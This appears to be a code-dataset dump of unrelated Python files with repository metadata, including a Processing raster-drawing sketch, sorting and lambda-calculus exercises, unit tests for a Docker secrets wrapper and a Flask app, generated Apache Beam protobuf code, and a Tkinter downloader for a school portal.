4*(1-a)*b*b dy = 4*(b1+1)*a*a # error of 1 step err = dx+dy+b1*a*a if x0 > x1: x0 = x1 x1 += a if y0 > y1: y0 = y1 # starting pixel y0 += (b+1)/2 y1 = y0-b1 a *= 8*a b1 = 8*b*b while True: # make it readable as error value is too large for nice printing e = map(err, -100000, 100000, -50, 50) self.point(x1, y0, e) self.point(x0, y0, e) self.point(x0, y1, e) self.point(x1, y1, e) e2 = 2*err if e2 <= dy: y0 += 1 y1 -= 1 dy += a err += dy if e2 >= dx or 2*err > dy: x0 += 1 x1 -= 1 dx += b1 err += dx if x0 > x1: break while y0-y1 < b: self.point(x0-1, y0) self.point(x1+1, y0) self.point(x0-1, y1) self.point(x0+1, y1) y0 += 1 y1 -= 1 def circle(self, xm, ym, r): x = -r y = 0 err = 2-2*r while True: self.point(xm-x, ym+y, err) self.point(xm-y, ym-x, err) self.point(xm+x, ym-y, err) self.point(xm+y, ym+x, err) r = err if r <= y: y += 1 err += y*2+1 if r > x or err > y: x += 1 err += x*2+1 if x >= 0: break def quadbezier(self, x0, y0, x1, y1, x2, y2): sx = x2 - x1 sy = y2 - y1 xx = x0 - x1 yy = y0 - y1 cur = xx*sy - yy*sx if not (xx*sx <= 0 and yy*sy <= 0): print('bezier curve gradient non-monotonic', xx*sx, yy*sy) return if sx*sx+sy*sy > xx*xx+yy*yy: x2 = x0 x0 = sx+x1 y2 = y0 y0 = sy+y1 cur = -cur if cur != 0: xx += sx sx = 1 if x0 < x2 else -1 xx *= sx yy += sy sy = 1 if y0 < y2 else -1 yy *= sy xy = 2*xx*yy xx *= xx yy *= yy if cur*sx*sy < 0: xx = -xx yy = -yy xy = -xy cur = -cur dx = 4.0*sy*cur*(x1-x0)+xx-xy; dy = 4.0*sx*cur*(y0-y1)+yy-xy xx += xx yy += yy err = dx+dy+xy while True: self.point(x0, y0, err) if x0 == x2 and y0 == y2: return y1 = 2*err < dx if 2*err > dy: x0 += sx dx -= xy dy += yy err += dy if y1: y0 += sy dy -= xy dx += xx err += dx if dy >= dx: break self.line(x0, y0, x2, y2) def draw(self): s = self.size y = 0 while y < height: x = 0 while x < width: fill(150, 150, 150) rect(x, y, s, s) x += s y += s textSize(24) fill(255) if mode == 0: text('line', 32, 32) self.line(self.x0, self.y0, self.x1, self.y1) elif mode == 1: text('thick line', 32, 32) self.thickline(self.x0, self.y0, self.x1, self.y1, 5) elif mode == 2: text('ellipse', 32, 32) self.ellipse(self.x0, self.y0, self.x1, self.y1) elif mode == 3: text('circle', 32, 32) x0, x1 = self.x0, self.x1 y0, y1 = self.y0, self.y1 if x1 < x0: x0, x1 = x1, x0 if y1 < y0: y0, y1 = y1, y0 self.circle((x0+x1)/2, (y0+y1)/2, (x1-x0)/2) elif mode == 4: text('quadratic bezier', 32, 32) x0, x1 = self.x0, self.x1 y0, y1 = self.y0, self.y1 if x1 < x0: x1 = x0 elif y1 < y0: y0 = y1 self.quadbezier(x0, y0, (x0+x1)/2, (y0+y1)/2, x1, y1) grid = None mode = 0 def setup(): global grid size(1280, 800) grid = Grid() def draw(): background(100) grid.draw() def keyPressed(ev): global mode if '1' <= key and key <= '9': mode = int(key) - int('1') def mousePressed(ev): global grid if ev.button == LEFT: grid.x0, grid.y0 = grid.pix2cell(mouseX, mouseY) grid.x1, grid.y1 = grid.x0, grid.y0 def mouseDragged(ev): global grid if ev.button == LEFT: grid.x1, grid.y1 = grid.pix2cell(mouseX, mouseY)
eadb8151a5ab098a99a1a02b85799e34647561b3
8e34e03fc53fbc465e3de0758e98b5b7c0145b85
/Listas y tuplas/Ejercicio3.py
3c89bd326f0a3774e50e9ee15dfe186747f7e7cb
[]
no_license
gonrodri18/Python
44ed944def671bdc44298f65f9dce0e8ff013b5d
b9653bd6357871ac1682a4eefdf6e36ace0b4ee5
refs/heads/master
2020-04-30T02:54:43.610378
2019-05-17T16:07:36
2019-05-17T16:07:36
176,573,384
0
0
null
null
null
null
UTF-8
Python
false
false
667
py
# Escribir un programa que almacene las asignaturas de un curso (por ejemplo Matemáticas, Física, Química, Historia y Lengua) en una lista, pregunte al usuario la nota que ha sacado en cada asignatura, y después las muestre por pantalla con el mensaje En <asignatura> has sacado <nota> donde <asignatura> es cada una des las asignaturas de la lista y <nota> cada una de las correspondientes notas introducidas por el usuario asignaturas = ['Mates' , 'Lengua' , 'Física'] notas = [] for i in asignaturas: notas.append (input ('¿Qué has sacado en ' + i + '? ')) for i in range(len(notas)): print ( 'En ' + asignaturas [i] + ' has sacado un ' + notas[i])
8b5ad6ffa898b3ca103c34c25ef37affb51f8bc6
7400c30135003160794856a745addd17cec8a58e
/Keyence2020B/test_pasted_from_page.py
7feb8b44afdb7cc83be6097799003b0525613220
[ "MIT" ]
permissive
staguchi0703/ant_book_2-2_greedy2
4b9587335610df7cccaefd069e8effbe13b89e0f
c5fc527874768bf5ea0c584b3f9f52a85eed87e2
refs/heads/master
2022-10-26T17:54:48.988597
2020-06-16T15:03:57
2020-06-16T15:03:57
271,589,306
0
0
null
null
null
null
UTF-8
Python
false
false
1,099
py
# from resolve import resolve #################################### #################################### # 以下にプラグインの内容をペーストする # import sys from io import StringIO import unittest class TestClass(unittest.TestCase): def assertIO(self, input, output): stdout, stdin = sys.stdout, sys.stdin sys.stdout, sys.stdin = StringIO(), StringIO(input) resolve() sys.stdout.seek(0) out = sys.stdout.read()[:-1] sys.stdout, sys.stdin = stdout, stdin print('------------') print(out) print('------------') self.assertEqual(out, output) def test_入力例_1(self): input = """4 2 4 4 3 9 3 100 5""" output = """3""" self.assertIO(input, output) def test_入力例_2(self): input = """2 8 20 1 10""" output = """1""" self.assertIO(input, output) def test_入力例_3(self): input = """5 10 1 2 1 4 1 6 1 8 1""" output = """5""" self.assertIO(input, output) if __name__ == "__main__": unittest.main()
ce4071b0a9e5f5c6e00ed63d6a9ac21489fc0c60
65f8211fc33eb5f9ac1ff0d68902226ca9a58692
/sorting_algorithms/bucket_sort.py
d43e2eb31d9e0de39477a48b9806faaa210e89fe
[]
no_license
szarbartosz/asd-python
46869f5699a1ef661e2df02e523af0adcddbbbda
0130cc3dcbba6ad62e1516c98b5cbab85848d619
refs/heads/master
2022-12-13T19:02:53.699381
2020-09-11T13:29:31
2020-09-11T13:29:31
242,975,318
0
0
null
null
null
null
UTF-8
Python
false
false
815
py
def insertion_sort(arr): for i in range(1, len(arr)): key = arr[i] j = i - 1 while j >= 0 and arr[j] > key: arr[j + 1] = arr[j] j -= 1 arr[j + 1] = key def bucket_sort(arr): sections = len(arr) buckets = [] for i in range(sections): buckets.append([]) for el in arr: index = int(el * sections) buckets[index].append(el) for i in range(len(buckets)): insertion_sort(buckets[i]) k = 0 for i in range(len(buckets)): for j in range(len(buckets[i])): arr[k] = buckets[i][j] k += 1 print(buckets) arr = [0.897, 0.565, 0.656, 0.1234, 0.665, 0.3434, 0.234, 0.513, 0.963, 0.123, 0.234, 0.043, 0.745, 0.514, 0.801, 0.734, 0.452, 0.401] bucket_sort(arr) print(arr)
84742225c61ab01770a4bce455aa015a98af5633
1f593a82f731a7aa500bfb3a6b02f6785edac345
/simi_w2v.py
2733096d2dfd307ba1375198cd3a9f76328c1604
[]
no_license
DanVane/Dtm_demo
6b4aa0ae3ba5f0526452b252bf4bf4a3aeb1190d
b19a99ea30bd4c74845c8707705fe2c77d96f553
refs/heads/master
2021-01-01T15:43:36.426314
2017-07-19T07:32:11
2017-07-19T07:32:11
97,686,860
1
0
null
null
null
null
UTF-8
Python
false
false
2,147
py
#coding=utf-8 from gensim.models import Word2Vec import json import re import string def load_data(): f=open("E:\\NetBeans\\dianziyisuo\\python\\data\\jichengdianlu1.txt",'rb') lines = f.readlines() # lines = re.sub(string.punctuation,"",lines) # lines = re.sub(r'[0-9]+', ' ', lines) all_lines=[] for line in lines: line = line.strip().lower() line = re.sub(r'[0-9]+','',line) line = line.replace(string.punctuation,"") all_lines.append(line.split()) model = Word2Vec(all_lines, size=100, window=5, min_count=0, workers=4) fname="w2v_models/w2v.model" model.save(fname) def cal_sim(): """ do something ... :return: """ fname = "w2v_models/w2v.model" model = Word2Vec.load(fname) for i in range(20): filename = "results/jichengdianlu/topic_"+str(i)+"_words_with_time.json" f=open(filename,'rb') data= json.load(f)[0] data = data['word'] all_data=[] for y_data in data: n_data =[word.split('*')[1] for word in y_data] all_data.append(n_data) first_words = [] second_words = [] for j in range(9): result = dict([]) for w1 in all_data[j]: for w2 in all_data[j+1]: if w1.strip()==w2.strip(): sim=0 else: try: sim = model.wv.similarity(w2.strip(), w1.strip()) except Exception, e: sim=0 pass w = w1.strip()+':'+w2.strip() result[w]=sim ll = sorted(result.iteritems(), key=lambda d: d[1])[::-1] first_words.append(ll[0]) second_words.append(ll[1]) sim_words = [ {'fist_words':first_words, 'second_words':second_words}, ] file_name = 'results/jichengdianlu/topic_%d_year_words_similarity.json' % i with open(file_name, 'w') as f: f.write(json.dumps(sim_words)) load_data() cal_sim()
2768ad34eabf9481540d2cdf79355f927c4a4b28
7f25234970f7a95d05c0266b03d9bb8eca9ab7c8
/dockerwithgitlabsecrets/tests/test_wrapper.py
2ed595f5f284269da686857f932b25e2298924a8
[ "MIT" ]
permissive
wtsi-hgi/docker-with-gitlab-secrets
ae96f68be75e5e6bc5b241845373994f2bdb85c1
53ed8be52e201b80f9c92cad72213dadf0bd63e6
refs/heads/master
2021-01-20T17:39:51.607908
2019-01-29T15:47:56
2019-01-29T15:47:56
90,881,192
0
0
null
null
null
null
UTF-8
Python
false
false
3,558
py
import unittest from tempfile import NamedTemporaryFile from dockerwithgitlabsecrets.tests._common import EXAMPLE_VALUE, EXAMPLE_PARAMETER, EXAMPLE_VARIABLES from dockerwithgitlabsecrets.wrapper import run_wrapped, SAFE_LINE_BREAK class TestWrapper(unittest.TestCase): """ Tests for `run_wrapped`. """ def test_help_with_docker_command(self): return_code, stdout, stderr = run_wrapped(["ps", "--help"], EXAMPLE_VARIABLES) self.assertEqual(0, return_code) self.assertIn("Usage:\tdocker ps", stdout.strip()) def test_with_non_supported_action(self): return_code, stdout, stderr = run_wrapped(["version"], EXAMPLE_VARIABLES) self.assertEqual(0, return_code) self.assertIn("Version", stdout.strip()) def test_has_standard_variable(self): return_code, stdout, stderr = run_wrapped( ["run", "-e", f"{EXAMPLE_PARAMETER}={EXAMPLE_VALUE}", "--rm", "alpine", "printenv", EXAMPLE_PARAMETER], EXAMPLE_VARIABLES) self.assertEqual(0, return_code) self.assertEqual(EXAMPLE_VALUE, stdout.strip()) def test_run_has_secret_variable(self): key, value = list(EXAMPLE_VARIABLES.items())[0] return_code, stdout, stderr = run_wrapped(["--debug", "run", "--rm", "alpine", "printenv", key], EXAMPLE_VARIABLES) self.assertEqual(0, return_code) self.assertEqual(value, stdout.strip()) def test_run_has_multiline_secret_variable(self): key, value = list(EXAMPLE_VARIABLES.items())[1] return_code, stdout, stderr = run_wrapped(["run", "--rm", "alpine", "printenv", key], EXAMPLE_VARIABLES) self.assertEqual(0, return_code) self.assertEqual(value.replace("\n", SAFE_LINE_BREAK), stdout.strip()) def test_run_cli_variable_has_higher_precedence(self): other_value = "other-value" key, value = list(EXAMPLE_VARIABLES.items())[0] return_code, stdout, stderr = run_wrapped(["run", "-e", f"{key}={other_value}", "--rm", "alpine", "printenv", key], EXAMPLE_VARIABLES) self.assertEqual(0, return_code) self.assertEqual(other_value, stdout.strip()) def test_run_with_env_file(self): key, value = list(EXAMPLE_VARIABLES.items())[0] key_2, value_2 = list(EXAMPLE_VARIABLES.items())[2] example_override = "override" with NamedTemporaryFile("w") as env_file: env_file.write(f"{key}={example_override}") env_file.flush() return_code, stdout, stderr = run_wrapped( ["run", "--env-file", f"{env_file.name}", "--rm", "alpine", "printenv", key], EXAMPLE_VARIABLES) self.assertEqual(0, return_code) self.assertEqual(example_override, stdout.strip()) return_code, stdout, stderr = run_wrapped( ["run", "--env-file", f"{env_file.name}", "--rm", "alpine", "printenv", key_2], EXAMPLE_VARIABLES) self.assertEqual(0, return_code) self.assertEqual(value_2, stdout.strip()) def test_run_in_interactive_mode(self): key, value = list(EXAMPLE_VARIABLES.items())[0] return_code, stdout, stderr = run_wrapped(["run", "--rm", "-t", "alpine", "printenv", key], EXAMPLE_VARIABLES, interactive=True) self.assertEqual(0, return_code) if __name__ == "__main__": unittest.main()
388846af9812028de504500008b6aa55a3f30332
e499a4388879e1db773b122cf4c0cecea6beecee
/jupyter-notebooks/scripts/parse_kml.py
e36b0f4e7cc4a733755e0b9774916c2d9f6ffd82
[]
no_license
randobucci/gccom-grids
4ecccca0076fef0a1582fda316cf309a7ae2633e
ab9e232eb467523fdb9bf1a0b09ccacc75700d0a
refs/heads/master
2020-03-07T11:32:34.485835
2018-03-30T18:11:24
2018-03-30T18:11:24
127,458,430
0
0
null
null
null
null
UTF-8
Python
false
false
1,300
py
#-------------------------------------------------------- #- File: parse_kml.py #- Description: Extract coordinates from Google Earth KML #- and convert to UTM, saving results. #- Author: Randy Bucciarelli #- Date: June 15, 2017 #-------------------------------------------------------- import sys from xml.dom.minidom import parseString #- Define source files input_args = sys.argv if (len(sys.argv) < 2): src_dir = '../input/' kml_file = src_dir+'lj-outline.kml' else: kml_file = input_args[1] #- Open kml file and read into memory file = open(kml_file) theData = file.read() file.close() #-Load data string into DOM theDom = parseString(theData) lats,lons,verts = [],[],[] #- Loop through dom and find coordinates for d in theDom.getElementsByTagName('coordinates'): #- Get all the vertices in first polygon positions = d.firstChild.data.split() for p in positions: coords = p.split(',') lats.append(float(coords[1])) lons.append(float(coords[0])) verts.append(0) #- Write geographic coords to outfile out_file = kml_file[0:len(kml_file)-4]+'_geo.xy' thefile = open(out_file, 'w') for i in range(len(lats)): thefile.write("%13.8f\t%13.8f\t%d\n" % (lons[i],lats[i],verts[i])) thefile.close() print("Created "+out_file)
266c7b9e2dd74454d2706479f7a79fc447b95cd3
0cf8c6d0da99141f1247aae3be88e80af9d611b9
/_02/a03_lambda.py
b683a11596fa561035e4ea9866d8b923ac76dc6f
[]
no_license
Xava2011/PythonWyklad
6c3676fa43df34ffc4eb8b7aa9b2529e99f680a6
643b1f351d1d486a720607a9f5e9d163d252c487
refs/heads/master
2021-01-17T08:45:37.673787
2017-03-05T10:20:44
2017-03-05T10:20:44
83,961,729
1
0
null
2017-03-05T10:23:23
2017-03-05T10:23:23
null
UTF-8
Python
false
false
1,837
py
# a03_lambda # # przyklady lambda wyrazen ############################ # proste przyklady f = (lambda x: x + 1) print f(1), (lambda x: x + 1)(3) # dziala jak def f(x): return x + 1 # Jakie sa roznice pomiedzy powyzszymi funkcjami? ############################ # niestety lambda wyrazenia w Pythonie nie sa w palni zgodne z # teoria lambda-rachunku # Sprobuj # (lambda x, y: y)(lambda y: y) # oraz # print (lambda x, y: y)((lambda y: y), 1) print (lambda x, y: x)((lambda y: y), 1)(5) # Jak widac lista parametrow odpowiada raczej krotce parametrow, # niz wielokrotnemu zastosowaniu # ale mozna pierwsza linie zapisac tak (lambda x: (lambda y: y))(lambda y: y) ############################ # W lambda-rzchunku mozemy wyrazic wiekszosc dobrze znanych bytow tt = (lambda x: (lambda y: x)) ff = (lambda x: (lambda y: y)) jesli = (lambda b: (lambda x: (lambda y: (b(x))(y)))) # jaka jest wartosc wyrazen print ((jesli(tt))(1))(2) print ((jesli(ff))(1))(2) # Zadanie z wykladu # Sprobowac wyrazic w Pythonowym lambda-rachunku: # a) pary i rzutowania # b) liczby naturalne ############################ # narzedzia programowania funkcyjnego # # filter(f, lita) = lista elementow e takich, ze f(e)=true def fff(x): return x % 2 != 0 and x % 3 != 0 print filter(fff, range(2, 25)) # map(f, lista) = f(lista) def cube(x): return x*x*x print map(cube, range(1, 11)) # funkcja moze miec wiecej niz jeden argument seq = range(8) def add(x, y): return x+y print map(add, seq, seq) print map((lambda x, y: x+y), seq, seq) # reduce(f, lista) = wylicza f(x,y) na kolejnych elementach listy 'sumujac ja' def add(x, y): return x+y print reduce(add, range(1, 11)) # przyklad sumowania list def sum(seq): def add(x, y): return x+y return reduce(add, seq, 0) sum(range(1, 11)) sum([])
023b871f8cdc5f16eb7f227fcbbd8a4f8aafa20c
77be4484580e1fafb429a73afd029520751c6012
/venv/lib/python3.8/site-packages/apache_beam/portability/api/beam_interactive_api_pb2.py
7da77f4054b53551025b7da2c93eafa7ce2e889d
[]
no_license
antoniofernandeslf/bankpoints
38f713cb23ef1cca209880af0e023b3d7331aa44
1f91c531ce96919755f0122a77b32d5b12b414d8
refs/heads/main
2023-03-03T11:40:57.897869
2021-02-15T18:47:25
2021-02-15T18:47:25
339,166,399
0
0
null
null
null
null
UTF-8
Python
false
true
4,459
py
# -*- coding: utf-8 -*- # Generated by the protocol buffer compiler. DO NOT EDIT! # source: beam_interactive_api.proto from __future__ import absolute_import from google.protobuf import descriptor as _descriptor from google.protobuf import message as _message from google.protobuf import reflection as _reflection from google.protobuf import symbol_database as _symbol_database # @@protoc_insertion_point(imports) _sym_db = _symbol_database.Default() from . import beam_runner_api_pb2 as beam__runner__api__pb2 from google.protobuf import timestamp_pb2 as google_dot_protobuf_dot_timestamp__pb2 DESCRIPTOR = _descriptor.FileDescriptor( name='beam_interactive_api.proto', package='org.apache.beam.model.interactive.v1', syntax='proto3', serialized_options=b'\n$org.apache.beam.model.interactive.v1B\016InteractiveApiZ\016interactive_v1', create_key=_descriptor._internal_create_key, serialized_pb=b'\n\x1a\x62\x65\x61m_interactive_api.proto\x12$org.apache.beam.model.interactive.v1\x1a\x15\x62\x65\x61m_runner_api.proto\x1a\x1fgoogle/protobuf/timestamp.proto\"#\n\x14TestStreamFileHeader\x12\x0b\n\x03tag\x18\x01 \x01(\t\"j\n\x14TestStreamFileRecord\x12R\n\x0erecorded_event\x18\x01 \x01(\x0b\x32:.org.apache.beam.model.pipeline.v1.TestStreamPayload.EventBF\n$org.apache.beam.model.interactive.v1B\x0eInteractiveApiZ\x0einteractive_v1b\x06proto3' , dependencies=[beam__runner__api__pb2.DESCRIPTOR,google_dot_protobuf_dot_timestamp__pb2.DESCRIPTOR,]) _TESTSTREAMFILEHEADER = _descriptor.Descriptor( name='TestStreamFileHeader', full_name='org.apache.beam.model.interactive.v1.TestStreamFileHeader', filename=None, file=DESCRIPTOR, containing_type=None, create_key=_descriptor._internal_create_key, fields=[ _descriptor.FieldDescriptor( name='tag', full_name='org.apache.beam.model.interactive.v1.TestStreamFileHeader.tag', index=0, number=1, type=9, cpp_type=9, label=1, has_default_value=False, default_value=b"".decode('utf-8'), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key), ], extensions=[ ], nested_types=[], enum_types=[ ], serialized_options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=124, serialized_end=159, ) _TESTSTREAMFILERECORD = _descriptor.Descriptor( name='TestStreamFileRecord', full_name='org.apache.beam.model.interactive.v1.TestStreamFileRecord', filename=None, file=DESCRIPTOR, containing_type=None, create_key=_descriptor._internal_create_key, fields=[ _descriptor.FieldDescriptor( name='recorded_event', full_name='org.apache.beam.model.interactive.v1.TestStreamFileRecord.recorded_event', index=0, number=1, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key), ], extensions=[ ], nested_types=[], enum_types=[ ], serialized_options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=161, serialized_end=267, ) _TESTSTREAMFILERECORD.fields_by_name['recorded_event'].message_type = beam__runner__api__pb2._TESTSTREAMPAYLOAD_EVENT DESCRIPTOR.message_types_by_name['TestStreamFileHeader'] = _TESTSTREAMFILEHEADER DESCRIPTOR.message_types_by_name['TestStreamFileRecord'] = _TESTSTREAMFILERECORD _sym_db.RegisterFileDescriptor(DESCRIPTOR) TestStreamFileHeader = _reflection.GeneratedProtocolMessageType('TestStreamFileHeader', (_message.Message,), { 'DESCRIPTOR' : _TESTSTREAMFILEHEADER, '__module__' : 'beam_interactive_api_pb2' # @@protoc_insertion_point(class_scope:org.apache.beam.model.interactive.v1.TestStreamFileHeader) }) _sym_db.RegisterMessage(TestStreamFileHeader) TestStreamFileRecord = _reflection.GeneratedProtocolMessageType('TestStreamFileRecord', (_message.Message,), { 'DESCRIPTOR' : _TESTSTREAMFILERECORD, '__module__' : 'beam_interactive_api_pb2' # @@protoc_insertion_point(class_scope:org.apache.beam.model.interactive.v1.TestStreamFileRecord) }) _sym_db.RegisterMessage(TestStreamFileRecord) DESCRIPTOR._options = None # @@protoc_insertion_point(module_scope)
d9249c8d210376bf26efed82210d8658a73b81d0
1df71aa9f94733d27069d22d8b2235495446ece1
/MacApp/PSDownloaderGUI.app/Contents/Resources/PSDownloaderGUI.py
37ae4dbb6588fab04ed4ef749d7b4c18ed1e6dac
[]
no_license
yemyat/PythonLeo
cd6f3b4f59d7bea079f107f608cb68d2a9160d53
fdb9558e92ee0f76a236d88679c47ca55dfa6f6c
refs/heads/master
2020-06-02T09:19:38.577756
2014-04-22T19:11:36
2014-04-22T19:11:36
1,104,736
0
3
null
2015-02-27T12:01:17
2010-11-23T06:17:59
Tcl
UTF-8
Python
false
false
2,827
py
import re import os import PythonLeo from Tkinter import * import threading import zipfile,shutil URL_LIST = {"current_module":"http://leo.rp.edu.sg/workspace/studentModule.asp?site=3", #to get project_id , group_id "current_problem":"http://leo3.rp.edu.sg//projectweb/project_menu.asp?", #to get topic_id, year2,3=>leo3, year1=>leo1 "problem_download":"http://leo.rp.edu.sg/projectweb/projectupload/savefolderas.asp?folder=/databank/projectbank/" }; def download(): response.set("Connecting") leo = PythonLeo.PythonLeo(username_field.get(),password_field.get()) #e.g. 91224, 12345 project_id_list = leo.parse_id("projectid",leo.open_url(URL_LIST["current_module"])) group_id_list = leo.parse_id("groupid",leo.open_url(URL_LIST["current_module"])) topic_id_list = leo.parse_id("topicid",leo.open_url(URL_LIST["current_problem"]+ "projectid="+str(project_id_list[-1])+ "&groupid="+str(group_id_list[-1]))) get_download_url = leo.open_url(URL_LIST["problem_download"]+topic_id_list[-1]) download_url = "http://leo.rp.edu.sg"+ re.search('HREF=\"(.+?zip)',get_download_url.read()).groups()[0] response.set("Downloading") os.chdir(os.path.expanduser("~/Desktop")) zip_file = open("problem.zip","wb") zip_file.write( leo.open_url(download_url).read() ) zip_file.close() extractDirectory="" file=open("problem.zip") ##WillYan zfile=zipfile.ZipFile(file) zip_dirs=zfile.namelist() zfile.extractall() new_folder=os.getcwd()+"/"+"Problem"+str(len(project_id_list))+"/" os.makedirs(new_folder) count=0 for i in zip_dirs: extractDirectory=os.getcwd()+"/"+str(i) filename=zip_dirs[count][(zip_dirs[count].rfind("/")+1)::] if(os.path.isdir(extractDirectory)==False): shutil.copyfile(extractDirectory,(new_folder+"/"+filename)) count+=1 os.remove("problem.zip") shutil.rmtree("Databank-CurrentSemester") response.set("Done!") def download_thread(dummy=1): threading.Thread(target=download).start() if __name__ == "__main__": root = Tk() root.title("LEO PS Downloader") main_frame = Frame(root,width=200,height=120) main_frame.grid(column=0,row=0) username_label = Label(main_frame, text="Username") username_label.grid(column=0,row=0) username_field =Entry(main_frame) username_field.grid(column=1,row=0,columnspan=2) password_label = Label(main_frame, text="Password") password_label.grid(column=0,row=1) password_field =Entry(main_frame,show="*") password_field.grid(column=1,row=1,columnspan=2) password_field.bind("<Return>",download_thread) response = StringVar() response.set("") response_label = Label(main_frame, textvariable=response,fg="red",anchor=W,justify=LEFT) response_label.grid(column=0,row=2) dl_button = Button(main_frame,text="Download",command=download_thread) dl_button.grid(column=2,row=2) root.mainloop()
481ee7906a744a489a5047dc23bddcf717f292f6
60d8335b0017fd2747efd14e50a446f9b61c1cf2
/en-US/extras/Usage-Example-9.py
2f0920d459dae949672009696bb0cf5611f5bd6a
[]
no_license
libvirt/libvirt-appdev-guide-python
7bfd9ca3ca27cbf2244b241a10d49ea3a133ae04
f652d7b8cf86ee4f61b2720a3a3d6b45042c7779
refs/heads/master
2023-08-22T01:30:57.157556
2023-07-03T10:22:31
2023-07-03T10:26:34
249,973,267
1
1
null
null
null
null
UTF-8
Python
false
false
66
py
stream = conn.newStream() imageType = domain.screenshot(stream,0)
b0eec7ecd9782b591815a35655ccffd969db10fc
010c5fc504e64d9d855daff1cbce44394bdfb263
/playfunction/playfunction/doctype/item_icon/test_item_icon.py
9bedf2a3b56808d0870ebe1b164a5e8b13d152d2
[ "MIT" ]
permissive
patilsangram/playfunction
05c30f0db23cf0edb87d0378294ebb6b4d0d95c0
e8cb03ef0091547bee8da65d5ce1cce7d68cace0
refs/heads/master
2023-05-27T17:59:42.255480
2020-07-28T14:06:54
2020-07-28T14:06:54
375,303,756
0
0
null
null
null
null
UTF-8
Python
false
false
209
py
# -*- coding: utf-8 -*- # Copyright (c) 2019, Indictrans and Contributors # See license.txt from __future__ import unicode_literals import frappe import unittest class TestItemIcon(unittest.TestCase): pass
ef4a01640e6d0ad4d796f424868a53ae7c91b2fc
153370f455850fd5d3da284e0d7053b9dee3b5d6
/tests/test_auth.py
5ed89cdf41eab07789ebb2e3985102cf205f8445
[]
no_license
baldarn/raspi_gate
58742073406fdcb4698a2b1c1deaf7b6c0e26bd9
c71bbf07e1feab518a97dac5aa27e0c7836f734c
refs/heads/master
2021-01-18T19:44:08.634193
2019-12-28T11:33:20
2019-12-28T11:33:20
86,909,161
0
0
null
null
null
null
UTF-8
Python
false
false
2,070
py
import pytest from flask import g, session from raspi_gate.db import get_db def test_register(client, app): # test that viewing the page renders without template errors assert client.get('/auth/register').status_code == 200 # test that successful registration redirects to the login page response = client.post( '/auth/register', data={'username': 'a', 'password': 'a'} ) assert 'http://localhost/auth/login' == response.headers['Location'] # test that the user was inserted into the database with app.app_context(): assert get_db().execute( "select * from user where username = 'a'", ).fetchone() is not None @pytest.mark.parametrize(('username', 'password', 'message'), ( ('', '', b'Username is required.'), ('a', '', b'Password is required.'), ('test', 'test', b'already registered'), )) def test_register_validate_input(client, username, password, message): response = client.post( '/auth/register', data={'username': username, 'password': password} ) assert message in response.data def test_login(client, auth): # test that viewing the page renders without template errors assert client.get('/auth/login').status_code == 200 # test that successful login redirects to the index page response = auth.login() assert response.headers['Location'] == 'http://localhost/' # login request set the user_id in the session # check that the user is loaded from the session with client: client.get('/') assert session['user_id'] == 1 assert g.user['username'] == 'test' @pytest.mark.parametrize(('username', 'password', 'message'), ( ('a', 'test', b'Incorrect username.'), ('test', 'a', b'Incorrect password.'), )) def test_login_validate_input(auth, username, password, message): response = auth.login(username, password) assert message in response.data def test_logout(client, auth): auth.login() with client: auth.logout() assert 'user_id' not in session
adcee245a95e9425a32e6b7427a416933d334339
48cf478689daa5c7558ccb6689b98cfaeb64ea0f
/Compilation/neural_network.py
24eddd9d47f6de3b2b29b106e3916c69cdf6d093
[]
no_license
demetriushrowland/machine_learning
d31454038719ccd61b6fb12db3d41da60a46ac59
d72db242700f1378181910ebdc2a82991647b422
refs/heads/master
2020-06-04T04:24:05.628961
2020-05-29T03:50:52
2020-05-29T03:50:52
191,871,729
0
0
null
null
null
null
UTF-8
Python
false
false
755
py
import numpy as np class Net: def __init__ (self, weights, activations): self.weights = weights self.num_input = weights[0].shape[1] self.num_hidden_layers = len(weights)-1 self.num_hidden = [weights[i].shape[1] for i in range(1, len(weights))] self.num_output = weights[-1].shape[0] self.activations = activations def forward (self, x): weights = self.weights activations = self.activations x = np.matmul(weights[0], x) x = activations[0](x) for hidden_layer_num in range(self.num_hidden_layers): x = np.matmul(weights[hidden_layer_num+1], x) x = activations[hidden_layer_num+1](x) return x def main(): return
d1d4911cc165e12b0c2b73a44e9fca1d654e75f1
936a0943b862cfbbd935adb7e2bf5ac6ec012375
/examples/basics.py
e04afd25e7c89cbfec558b18ce2ea9d2a79043bd
[ "MIT" ]
permissive
bgheneti/rai-python
b23c65f938acd2656a925c5a4adb7858d333992c
2956004853525795dfde210266d9bbf3292d27ee
refs/heads/master
2020-04-10T10:59:24.439509
2018-12-08T11:41:18
2018-12-08T11:41:18
160,981,304
0
0
MIT
2018-12-08T21:45:56
2018-12-08T21:45:56
null
UTF-8
Python
false
false
683
py
#!/usr/bin/python3 import sys sys.path.append('../ry') from libry import * K = Config() D = K.view() K.addFile('../rai-robotModels/pr2/pr2.g'); K.addFile('../test/kitchen.g'); print("joint names: ", K.getJointNames()) print("frame names: ", K.getFrameNames()) q = K.getJointState() print('joint state: ', q) q[2] = q[2] + 1. K.setJointState(q) X = K.getFrameState() print('frame state: ', X) X = X + .1 K.setFrameState(X.flatten().tolist()) q = K.getJointState() print('joint state: ', q) q[2] = q[2] + 1. K.setJointState(q) K.addFrame("camera", "head_tilt_link", "Q:<d(-90 1 0 0) d(180 0 0 1)> focalLength:.3") C = K.view(frame="camera") input("Press Enter to continue...")
b402ed27715c8cdf48833fe2f9f37f17572776b9
80f316c1bf2f705e82e98f485c3498b0044ff76d
/images/migrations/0002_auto_20160323_1424.py
2059faca9563d18ce83b0eaa9554796a37d1f8ad
[]
no_license
lfalvarez/django-images
789933ce0d522644471e2d678c613ae13a6eb40b
f30e995da644101ee21b6a667e4400de3d5fff12
refs/heads/master
2020-12-11T07:59:39.015651
2016-03-24T11:02:51
2016-03-24T11:06:34
57,898,112
0
0
null
2016-05-02T15:00:28
2016-05-02T15:00:28
null
UTF-8
Python
false
false
455
py
